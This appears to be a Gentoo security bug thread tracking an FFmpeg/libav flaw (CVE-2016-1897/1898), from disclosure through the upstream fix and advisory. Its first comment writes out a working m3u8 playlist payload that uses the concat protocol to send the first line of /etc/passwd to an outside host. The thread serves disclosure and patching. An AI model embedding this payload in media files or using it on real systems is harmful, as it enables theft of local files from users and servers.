From ${URL} : Hello! I found some strange behavior in ffmpeg which can lead to stealing local files during ffmpeg/ffprobe exec, it's also applied to libav. I've underestimated the impact of this bug, so it was full disclosured in this article (Russian language, but google translate works fine with it) - http://habrahabr.ru/company/mailru/blog/274855 In short: if linux user download specially prepared video file (with any extension: avi/mov/etc..) which contains HLS m3u8 playlist with "concat" protocol in url:, #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://dx.su/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST header.m3u8: #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://example.org? If user launches ffmpeg-based video player (MPlayer, etc..), first line of /etc/passwd will be sent to http://example.org? in http://example.org?# $FreeBSD: release/100.0/et.. request. The same happens when file manager tries to generate thumbnail for this file. All this can be applied to server-run ffmpeg during video conversion. FFmpeg/libav security teams are already notified, but official patches are not available yet, so you can rebuild ffmpeg with --disable-network configure option which prevents this vulnerability from being exploited. Moreover, it's always recommended to run ffmpeg in isolated environment when processing untrusted files (googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html) @maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
CVE-2016-1898 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1898): FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read arbitrary files by using the subfile protocol in an HTTP Live Streaming (HLS) M3U8 file, leading to an external HTTP request in which the URL string contains an arbitrary line of a local file. CVE-2016-1897 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1897): FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read arbitrary files by using the concat protocol in an HTTP Live Streaming (HLS) M3U8 file, leading to an external HTTP request in which the URL string contains the first line of a local file.
Upstreams resolution was to disable concat per default: https://git.libav.org/?p=libav.git;a=blob;f=Changelog;hb=refs/tags/v11.6#l7 We have disabled concat as well, https://gitweb.gentoo.org/repo/gentoo.git/tree/media-video/libav/libav-11.6.ebuild?id=699e5ef7bf5d2f62bff41d508796ae60403a8adb#n180
Added to an existing GLSA Request. Maintainer(s), please drop the vulnerable version(s).
This issue was resolved and addressed in GLSA 201705-08 at https://security.gentoo.org/glsa/201705-08 by GLSA coordinator Kristian Fiskerstrand (K_F).
